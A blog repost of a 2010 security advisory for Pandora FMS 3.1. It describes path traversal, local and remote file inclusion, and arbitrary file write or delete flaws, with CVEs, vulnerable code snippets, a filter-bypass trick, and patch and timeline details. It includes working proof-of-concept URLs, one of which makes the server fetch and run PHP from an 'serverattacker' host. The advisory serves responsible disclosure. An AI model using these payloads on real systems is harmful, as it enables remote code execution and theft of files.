February 1, 2011 at 11:56 pm | Posted in Article, computer and high technology | Leave a comment

>

It can be deployed in almost any operating system. It features remote
monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP…) and it can also use
agents. An agent is available for each platform. It can also monitor
hardware systems with a TCP/IP stack, such as load balancers, routers,
network switches, printers or firewalls.

This software has several servers that process and get information from
different sources, using WMI for gathering remote Windows information, a
predictive server, a plug-in server which makes complex user-defined
network tests, an advanced export server to replicate data between
different sites of Pandora FMS, a network discovery server, and an SNMP
Trap console.

Released under the terms of the GNU General Public License, Pandora FMS
is free software.

5) Path Traversal:

5.1 – PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) –
CVE-2010-4281 -CVE-2010-4282 – CVSS 8.5/10

Parameter ‘page’ of ajax.php is not properly sanitizing user-supplied
input. The function safe_url_extraclean is filtering ‘:’ character, and
it doesn’t allow to use the string “http://”; to create urls, but allows
‘/’ character and an attacker could reference remote resources via
Windows UNC files, using //servername//resource/file

Note that the first check in safe_url_extraclean is filtering ‘://’, so
we can bypass the filter easily doing http://http://url, and it only
strip the first protocol://. However, the last preg_replace strips the :
character.

Proof of concept:  UNC: http://servername/pandora_console/ajax.php?page=//server/share/test  As well, ajax.php allows to include any php file in the disk  filesystem:  http://servername/pandora_console/ajax.php?page=../../../../../directory/file  Character  is not allowed due safe_url_extraclean function filtering, and is not possible to include other files distinct that php files, but still allows . and / characters.  5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283 - - CVSS 7.9/10  An attacker can inject arbitrary PHP code and execute it remotely due argv[1] parameter is not filtered in file pandora_diag.php.  PoC:  http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php  Note: that issue needs register_globals set to On to be exploitable.  5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10  An attacker can include arbitrary files of the filesystem via id parameter in file pandora_help.php.  Snippet of vulnerable code:   24 $id = get_parameter ('id');  25  26 /* Possible file locations */  27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",  28 $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",  29 $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",  30         $config["homedir"]."/include/help/en/help_".$id.".php");  31 $help_file = '';  32 foreach ($files as $file) {  33         if (file_exists ($file)) {  34                 $help_file = $file;  35                 break;  36         }  37 } ...  62 require_once ($help_file);  Proof of concept:  http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini  This code is platform dependent bug, you can read more at  http://seclists.org/fulldisclosure/2010/Jul/137  Only works in windows systems, an attacker can include local file using ../ characters due parameter id is not filtered If magic_quotes_gpc is Off, arbitrary files can be included, like boot.ini using NULL character (), if not, only php files are allowed  5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - - CVSS 8.0/10  In file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and it is used to write and delete files on the filesystem. An attacker could use this parameter to write in arbitrary paths and even remove files.  Snippet of vulnerable code:  32 $layout = (string) get_parameter ('layout', 'radial'); ... 137 $filename_map = $config["attachment_store"]."/networkmap_".$layout; 138 $filename_img = "attachment/networkmap_".$layout."_".$font_size; 139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout; ... 157         $fh = @fopen ($filename_dot, 'w'); 158         if ($fh === false) { 159                 $result = false; 160         } else { 161                 fwrite ($fh, $graph); 162                 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng - -o".$filename_img." ".$filename_dot; 163                 $result = system ($cmd); 164                 fclose ($fh); 165                 unlink ($filename_dot); 166         } ... 178         require ($filename_map);  Character sequences '../' could be used to write files (due -o parameter in lines 162 and 163), as well as potentially remove files (line 157, 161 and 165) or include them (line 178) As well like in 5.3 this issue is only exploitable in windows environments because the same reason.  [+] Impact  An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system.  [+] Systems affected  Versions prior and including 3.1 of Pandora FMS are affected  [+] Solution  Apply the security fix for version 3.1:  http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download  Or upgrade to version 3.1.1 from  http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/ 

[+] Timeline

Ago 2010: First contact to vendor
Ago 2010: Confirmation of vendor
Sept 2010: Second contact: SQL Injection vulnerabilities
Sept 2010: Confirmation that the fix will be released on October
Oct 2010: PandoraFMS security patch for 3.1 version released
Oct 2010: Request for CVE numbers
Nov 2010: PandoraFMS version 3.1.1 released
Nov 2010: Disclosure of this advisory

[+] References

Official PandoraFMS site: http://pandorafms.org/
SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
Common Vulnerability Scoring System (CVSS) v2 calculator:

http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/

[+] Credits

These vulnerabilities has been discovered by Juan Galiana Lara –
@jgaliana – http://juangaliana.blogspot.com/

—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy
YbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s
IVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9
WIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4
cC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP
JPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP
8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4
7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH
pARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5
yNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4
oBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF
sn9vRJk4gc/PozOXDjC3
=WmOh
—–END PGP SIGNATURE—–

Leave a Comment »

RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a free website or blog at WordPress.com.
Entries and comments feeds.

%d bloggers like this: